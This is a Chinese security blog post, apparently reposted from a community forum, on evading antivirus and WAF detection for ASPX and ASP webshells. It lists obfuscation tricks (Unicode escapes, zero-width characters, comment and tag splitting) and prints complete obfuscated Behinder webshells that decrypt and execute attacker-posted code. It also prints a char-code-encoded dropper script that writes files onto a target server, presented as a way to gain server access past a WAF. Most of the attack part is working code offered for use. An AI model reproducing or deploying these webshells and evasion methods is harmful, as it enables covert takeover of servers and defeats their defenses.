关于webshell免杀的应用思路

admin
admin
admin
102612
文章
87
评论
2022年12月16日14:31:44评论25 views字数 6569阅读21分53秒阅读模式

ə head@深蓝实验室重保天佑战队

前言

在攻防场景下,比如我们常常在找到某个上传接口,第一步肯定是先测试后缀是否有限制,第二步则是测试上传的文件是否能解析,最后便确认即将要上传的webshell内容是否有拦截。这里针对webshell内容拦截这块做了记录,下面先对aspx类型和asp类型这两块展开,希望能给大家作为参考。

一、Aspx类型

其中aspx类型中,我们可以利用下面列出的这些特性对内容作对应的处理,以达到免杀的目的

1、unicode编码
2、空字符串连接
3、<%%>截断
3、头部替换
5、特殊符号@
6、注释
1.统一码编码

例如“eval”他可以变为u0065u0076u0061u006C

那么如下例子可以转换为:

<%@ Page Language="Jscript"%><%u0065u0076u0061u006c(@Request.Item["hello"],"unsafe");%>

关于webshell免杀的应用思路

2、空字符串连接

Unicode是支持在ASPX里进行的,同样的,它也支持asmx和ashx,估计这类特性都是通用的。并且在unicode有一类字符叫做零宽连字符(全称零宽度连接器)。

在函数字符串中插入这些字符都不会影响脚本的正常运行,在测试前需要注意该类字符插入的位置,否则插入错误的地方会产生报错

u200c
u200d
u200e
u200f

除了上面的零宽度joiner,还有一种unicode编码叫做零宽不折行空格,也就是如下几种字符,都支持在字符间进行拼接

ufeff
u202a
u202b
u202c
u202d
u202e

例子:

<%c = Request.BinaryRead(Request.Cu202conu202dtentu202bLenu202egth);%>
3、使用<%%>语法

将整个字符串与函数利用多个<%%>进行分割

<%@ Page Language="Jscript"%><%u0065u0076u0061u006c%><%(Request.%>
4、头部免杀

该字段可以放在后面,不一定要放前面

<%@Page Language="csharp"%>
<%@ Page Language="Jscript"%>
<%@Page Language=JS%>
<% @language="Csharp" %>
5、使用符号

可以添加@符号但是不会影响其解析

<%.@CreateDecryptor(System.Text.Encoding.Default.GetBytes(key), System.Text.Encoding.Default.GetBytes(key))%>
6、注释插入
<%/*TreeObject*/./*TreeObject*/GetBytes(Session[0] + ""),%>
7、花括号和分号

{}和分号;在原本语法结束的地方可以添加大量的该类混淆,不会影响其原本的解析

<% @page language=c#%>;;;;;;;;;;;;;;;;;;;;
<%@Import Namespace="System.Reflection"%><%Session.Add("k","e45e329feb5d925b");{{{}}} byte[] k = Encoding.Default.GetBytes(Session[0] + ""),c = Request.BinaryRead(Request.ContentLength);{{{;}}} Assembly.Load(new System.Security.Cryptography.RijndaelManaged().CreateDecryptor(k, k).TransformFinalBlock(c, 0, c.Length)).CreateInstance("U").Equals(this);;;;;;;;;;;;;;;;;;;;;%>

关于webshell免杀的应用思路

8、aspx别的声明标签

在php中,解析引擎可以认识

1、XML标记风格
<?php
echo "XML 标记风格"
?>
2、脚本风格
<script language='php'>
echo "脚本风格";
</script>
3、简短标记风格
<?
echo "简短标记风格"
?>
注意php.ini中的short_open_tag 选项必须为on
4、ASP标记风格
<%
echo '这是asp标记风格'
%>
注意php.ini中的asp_tags 选项必须为on

aspx中也有类似的标签风格,如下:

<% @language="C#" %>
<%Response.Write("hello");%>
<script language=csharp runat=server>
void page_load(){Response.Write("hello");}
</script>
9、换行特性
10、C#的 ///特性和XML

C#规定了 /// 能够在ASPX中作为XML语法的注释,那么在实际使用中,我们结合换行、Unicode特性可以这样做,在如下内容中加入///充当注释:

<%
@
language 
= 
c#
%>
<%
@Import 
 Namespace="System.Reflection"%>
<%Session.Add("k",
//////@#@!#!@#!@#!@#!@#!@#!@#
"e45e329feb5d925b"); byte[]
//////@#@!#!@#!@#!@#!@#!@#!@#
 k = Encoding.Default.GetBytes(Session[0] + ""),
//////@#@!#!@#!@#!@#!@#!@#!@#
c = Request.BinaryRead(Request.Cu202conu202dtentu202bLenu202egth); 
//////@#@!#!@#!@#!@#!@#!@#!@#%>

那么这时我们综上所说到的这些特性,对冰蝎马进行免杀处理,可以得到如下内容:

<%@Import Namespace="System./*TreeObject*/U00000052U00000065U00000066U0000006CU00000065U00000063U00000074U00000069U0000006FU0000006E"%>
<%U00000053U00000065U00000073U00000073U00000069U0000006FU0000006E/*TreeObject*/.U00000041U00000064U00000064("k","e45e329feb5d925b"); %>
<%byte[] k = U00000045U0000006EU00000063U0000006FU00000064U00000069U0000006EU00000067/*TreeObject*/./*TreeObject*/Default%>
<%/*TreeObject*/./*TreeObject*/U00000047U00000065U00000074U00000042U00000079U00000074U00000065U00000073(U00000053U00000065U00000073U00000073U00000069U0000006FU0000006E[0] + ""),//////@#@!#!@#!@#!@#!@#!@#!@#%>
<%c = U00000052U00000065U00000071U00000075U00000065U00000073U00000074/*TreeObject*/./*TreeObject*/U00000042U00000069U0000006EU00000061U00000072U00000079U00000052U00000065U00000061U00000064/*TreeObject*/(Request.ContentLength);//////@#@!#!@#!@#!@#!@#!@#!@#/*TreeObject*/%>
<%Assembly/*TreeObject*/./*TreeObject*/@U0000004CU0000006FU00000061U00000064(new System./*TreeObject*/Security%>
<%./*TreeObject*/@U00000043U00000072U00000079U00000070U00000074U0000006FU00000067U00000072U00000061U00000070U00000068U00000079.U00000052U00000069U0000006AU0000006EU00000064U00000061U00000065U0000006CU0000004DU00000061U0000006EU00000061U00000067U00000065U00000064()%>
<%./*TreeObject*/@U00000043U00000072U00000065U00000061U00000074U00000065U00000044U00000065U00000063U00000072U00000079U00000070U00000074U0000006FU00000072(k, k)%>
<%./*TreeObject*/@U00000054U00000072U00000061U0000006EU00000073U00000066U0000006FU00000072U0000006DU00000046U00000069U0000006EU00000061U0000006CU00000042U0000006CU0000006FU00000063U0000006B(c, 0, c.Length))%>
<%./*TreeObject*/U00000043U00000072U00000065U00000061U00000074U00000065U0000202cU00000049U0000006EU00000073U00000074U00000061U0000006EU00000063U00000065/*TreeObject*/%>
<%(/*TreeObject*/"U"/*TreeObject*/%>
<%)%>
<%./*TreeObject*/U00000045U00000071U00000075U00000061U0000006CU00000073(this);{{{;}}}%>
<% @language="CSHARP" %>

关于webshell免杀的应用思路

同理,哥斯拉等其他的也可以按照这种方法作免杀处理。

二、ASP类型

可通过变量赋值替换,组合换行的方式进行免杀

比如常见的一句话通过变量赋值替换,即可免杀D盾

<%dim a(5)%><%a(0) = request("404")%><%b = LTrim(a(0))%><%response.write("hello")%><%eXecUTe(b)%>

关于webshell免杀的应用思路

那么下面我们就可以利用这两个特性对冰蝎马进行免杀处理,同样得到如下内容:

<%Response.write("Welcome,This is a TestPage")%><%dim a(5)%><%Response.CharSet = "UTF-8"%> <%k="3b0c14770e6bd663" %><%Session("k")=k%><%size=Request.TotalBytes%><%content=Request.BinaryRead(size)%><%For i=1 To size%><%x=ascb(midb(content,i,1))%><%y=Asc(Mid(k,(i and 15)+1,1))%><%result=result&Chr(x Xor y)%><%a(0)=result%><%b = LTrim(a(0))%><%Next%>
<%
<!--
exEcUTe(b)
-->
%>

关于webshell免杀的应用思路

ps:再补充一个之前在xx项目测试中,利用中间马的方式绕过waf写入webshell,大概原理就是先上传一个写文件功能的,利用该功能再往目标服务器写入webshell。

往当前目录写入TypeError.asp,文件内容为<%response.write(“hello”)%>

关于webshell免杀的应用思路

Server.CreateObject("Scripting.FileSystemObject").OpenTextFile(Server.MapPath("TypeError.asp"),2,True).WriteLine(HexToStr("3c25726573706f6e73652e7772697465282268656c6c6f2229253e"))

其中我们再定义两个函数用于混淆

Function JXMD(MM):
MM = Split(MM,"-")
For x=0 To Ubound(MM)
JXMD=JXMD&Chr(MM(x))
Next
End Function

Function HexToStr(ByRef strHex)
Dim Length
Dim Max
Dim Str
Max = Len(strHex)
For Length = 1 To Max Step 2
Str = Str & Chr("&h" & Mid(strHex, Length, 2))
Next
HexToStr = Str
End function

ok,接下来我们再做一下数据处理

最后可以得到如下内容:

关于webshell免杀的应用思路

<%
<!--
Function JXMD(MM):
MM = Split(MM,"-")
For x=0 To Ubound(MM)
JXMD=JXMD&Chr(MM(x))
Next
End Function

Function HexToStr(ByRef strHex)
Dim Length
Dim Max
Dim Str
Max = Len(strHex)
For Length = 1 To Max Step 2
Str = Str & Chr("&h" & Mid(strHex, Length, 2))
Next
HexToStr = Str
End function

eXecUTe(JXMD("83-101-114-118-101-114-46-67-114-101-97-116-101-79-98-106-101-99-116-40-34-83-99-114-105-112-116-105-110-103-46-70-105-108-101-83-121-115-116-101-109-79-98-106-101-99-116-34-41-46-79-112-101-110-84-101-120-116-70-105-108-101-40-83-101-114-118-101-114-46-77-97-112-80-97-116-104-40-34-84-121-112-101-69-114-114-111-114-46-97-115-112-34-41-44-50-44-84-114-117-101-41-46-87-114-105-116-101-76-105-110-101-40-72-101-120-84-111-83-116-114-40-34-51-99-50-53-55-50-54-53-55-51-55-48-54-102-54-101-55-51-54-53-50-101-55-55-55-50-54-57-55-52-54-53-50-56-50-50-54-56-54-53-54-99-54-99-54-102-50-50-50-57-50-53-51-101-34-41-41"))

-->
%>

同样也是具有免杀效果的

这里可以看到访问02.asp成功往目标服务器当前目录写入预先内容的TypeError.asp

关于webshell免杀的应用思路

关于webshell免杀的应用思路

关于webshell免杀的应用思路

利用这种方式,我们便可以绕过waf往目标写入webshell,从而获取服务器权限。

同理,aspx类型的也可以利用这种方式尝试绕过waf写入对应的webshell。




来源先知社区的【əhead 】师傅

注:如有侵权请联系删除

关于webshell免杀的应用思路


 

如需进群进行技术交流,请扫该二维码

关于webshell免杀的应用思路


原文始发于微信公众号(衡阳信安):关于webshell免杀的应用思路

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年12月16日14:31:44
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   关于webshell免杀的应用思路https://cn-sec.com/archives/1467545.html

发表评论

匿名网友 填写信息